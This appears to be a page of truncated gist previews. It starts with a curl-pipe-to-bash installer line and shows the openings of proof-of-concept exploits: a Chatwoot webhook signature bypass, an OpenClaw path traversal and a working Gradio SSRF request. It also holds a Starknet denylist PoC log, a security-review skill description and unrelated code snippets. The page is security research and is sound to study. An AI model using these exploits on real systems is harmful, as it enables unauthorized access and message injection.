curl -fsSL https://tachyon.so/install.sh | bash

Requires Python 3.11+. The script installs pipx if needed.
| #!/usr/bin/env python3 | |
| """ | |
| PoC: Chatwoot Instagram & WhatsApp webhook signature bypass — unauthenticated message injection. | |
| Spins up Chatwoot via Docker, sends unsigned webhook payloads, and verifies | |
| that attacker-crafted messages are stored in the database as legitimate | |
| incoming customer messages. | |
| Requires: Docker with compose v2, ports 3100/5433/6380 free. | |
| Usage: python3 poc_minimal.py [--keep] |
| #!/usr/bin/env node | |
| import { execSync } from "node:child_process"; | |
| import fs from "node:fs"; | |
| import path from "node:path"; | |
| import os from "node:os"; | |
| const pocDir = path.join(os.tmpdir(), "openclaw-traversal-poc-" + Date.now()); | |
| const configDir = path.join(os.homedir(), ".openclaw"); | |
| const extensionsDir = path.join(configDir, "extensions"); |
| #!/usr/bin/env python3 | |
| """Exploit: access internal service through victim's proxy endpoint.""" | |
| import httpx | |
| VICTIM = "http://127.0.0.1:7860" | |
| INTERNAL = "http://127.0.0.1:9999/" | |
| # SSRF via /gradio_api/proxy=<url> | |
| resp = httpx.get(f"{VICTIM}/gradio_api/proxy={INTERNAL}") |
| { | |
| "timestamp": "2025-11-26T21:42:32.750Z", | |
| "denylistedRecipient": { | |
| "hex": "0x00000000000000000000000000000000000000000000000000000000deadbeef", | |
| "decimal": "3735928559" | |
| }, | |
| "contracts": { | |
| "stablecoin": "0x26a1971b64ed77c82ec85fc83bc3d1a1ea867e776e61be6a8872c321ecd87b6", | |
| "tokenMessengerMinter": "0x1a8aef65113f8a4c46ac2793e3b02e9d32cc43a79b171df50d4fcbd684ce636", | |
| "messageTransmitter": "0x4356cdc4411523c5cc98a2e09c723ddee4e051b615d3cf12bc152b49c20e45f" |
| Starting Starknet node using runtime: docker | |
| >> Launching container via docker compose -f /Users/aakashjapi/projects/starknet-cctp/repros/denylist_poc/devnet/docker-compose.yml up | |
| WARN[0000] /Users/aakashjapi/projects/starknet-cctp/repros/denylist_poc/devnet/docker-compose.yml: the attribute `version` is obsolete, it will be ignored, please remove it to avoid potential confusion | |
| [+] Building 0.6s (17/17) FINISHED | |
| ... 0.0s | |
| => resolving provenance for metadata file 0.0s | |
| [+] Running 3/3 | |
| ✔ devnet-starknet-devnet Built |
| name | description |
|---|---|
| vibecoder-review | Practical OWASP-focused security review for fast-moving codebases built with AI assistance - catches common patterns where speed trumps security (exposed secrets, auth bypasses, missing access controls, injection vulnerabilities) |
Target audience: Fast-moving codebases built by developers using AI assistance, rapid prototyping tools, and modern frameworks. These projects prioritize speed and iteration, often skipping security fundamentals.
| import java.util.ArrayList; | |
| class BlockingQueue { | |
| private ArrayList<Character> queue; | |
| public BlockingQueue() { | |
| queue = new ArrayList<Character>(); | |
| } | |
| public synchronized String take() { |
| from sys import argv | |
| import os | |
| def inputFunc(): | |
| if len(argv) >= 2: | |
| if os.path.isfile(argv[1]): | |
| text = open(argv[1]).read() | |
| else: | |
| print('not a file') | |
| else: |